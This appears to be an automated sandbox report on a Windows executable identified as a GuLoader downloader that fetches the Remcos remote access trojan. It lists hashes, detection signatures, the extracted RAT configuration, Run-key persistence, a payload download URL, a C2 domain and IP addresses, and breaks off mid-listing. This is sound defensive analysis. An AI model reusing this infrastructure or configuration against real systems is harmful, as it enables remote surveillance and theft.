Edit tour

Windows Analysis Report
ix8kxoBHDb.exe

Overview

General Information

Sample name:	ix8kxoBHDb.exe renamed because original name is a hash value
Original sample name:	d0625305c7cada6abafc98eca583c35ac2e25028cb63f43fee168b9bb6c5f8fb.exe
Analysis ID:	1588998
MD5:	d09dbfcaacc4e72dc2ff2d9119b7b9f1
SHA1:	8691ac9bbabbe829446b56c73888d8a0adf0b92b
SHA256:	d0625305c7cada6abafc98eca583c35ac2e25028cb63f43fee168b9bb6c5f8fb
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Yara detected GuLoader

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious values (likely registry only malware)

Drops PE files with a suspicious file extension

Machine Learning detection for dropped file

Machine Learning detection for sample

Opens the same file many times (likely Sandbox evasion)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

ix8kxoBHDb.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\ix8kxoBHDb.exe" MD5: D09DBFCAACC4E72DC2FF2D9119B7B9F1)

ix8kxoBHDb.exe (PID: 7876 cmdline: "C:\Users\user\Desktop\ix8kxoBHDb.exe" MD5: D09DBFCAACC4E72DC2FF2D9119B7B9F1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["ro:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-X164UO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1444216544.0000000004C79000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: ix8kxoBHDb.exe PID: 7876	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 2B E1 25 85 10 02 9B 5B 9C 1F E2 F8 78 93 E7 18 FE 0C AF CD 94 96 BF 63 36 84 04 8B F1 0B 3E FB 28 96 EC 4D 58 38 5F 76 49 F1 3D 6B 79 C7 6F 36 CF 55 6F 5B 7C 38 6D 70 BE A5 5B 4A 26 3E 81 BC 69 C8 83 85 48 7F A3 14 25 FA 9D 28 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ix8kxoBHDb.exe, ProcessId: 7876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-X164UO\exepath

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:11:49.256053+0100	2803270	2	Potentially Bad Traffic	192.168.2.11	49867	164.160.91.32	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["ro:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-X164UO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: ix8kxoBHDb.exe	ReversingLabs: Detection: 63%
Source: ix8kxoBHDb.exe	Virustotal: Detection: 70%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ix8kxoBHDb.exe PID: 7876, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ix8kxoBHDb.exe

Joe Sandbox ML: detected

Source: ix8kxoBHDb.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.11:49867 version: TLS 1.2

Source: ix8kxoBHDb.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_0040672B FindFirstFileW,FindClose,	0_2_0040672B
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AFA
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_00402868 FindFirstFileW,	2_2_00402868
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_0040672B FindFirstFileW,FindClose,	2_2_0040672B
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405AFA

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: ro

Source: Joe Sandbox View

IP Address: 164.160.91.32 164.160.91.32

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49867 -> 164.160.91.32:443

Source: global traffic

HTTP traffic detected: GET /cdOCcPHZK213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.healthselflesssupplies.co.za
Source: global traffic	DNS traffic detected: DNS query: kezdns.pro

Source: ix8kxoBHDb.exe, Leucocytopenia.scr.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/
Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/%
Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005858000.00000004.00000020.00020000.00000000.sdmp, ix8kxoBHDb.exe, 00000002.00000002.3785385637.0000000007530000.00000004.00001000.00020000.00000000.sdmp, ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bin
Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bins

Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867

Source: unknown

HTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.11:49867 version: TLS 1.2

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Code function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040558F

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ix8kxoBHDb.exe PID: 7876, type: MEMORYSTR

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_004034A5

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_00404DCC	0_2_00404DCC
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_00406AF2	0_2_00406AF2
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_73B01B5F	0_2_73B01B5F
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_00404DCC	2_2_00404DCC
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_00406AF2	2_2_00406AF2

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Code function: String function: 00402C41 appears 51 times

Source: ix8kxoBHDb.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/11@45/1

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_004034A5

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Code function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404850

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

File created: C:\Users\user\AppData\Roaming\brugser

Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-X164UO

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

File created: C:\Users\user\AppData\Local\Temp\nslD2D9.tmp

Jump to behavior

Source: ix8kxoBHDb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ix8kxoBHDb.exe	ReversingLabs: Detection: 63%
Source: ix8kxoBHDb.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

File read: C:\Users\user\Desktop\ix8kxoBHDb.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ix8kxoBHDb.exe "C:\Users\user\Desktop\ix8kxoBHDb.exe"
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process created: C:\Users\user\Desktop\ix8kxoBHDb.exe "C:\Users\user\Desktop\ix8kxoBHDb.exe"
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process created: C:\Users\user\Desktop\ix8kxoBHDb.exe "C:\Users\user\Desktop\ix8kxoBHDb.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: skovmandshilsnerne.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\Windows\punktnedslagenes\Suspired157.Ege

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

File written: C:\Users\user\AppData\Local\Temp\tmc.ini

Jump to behavior

Source: ix8kxoBHDb.exe

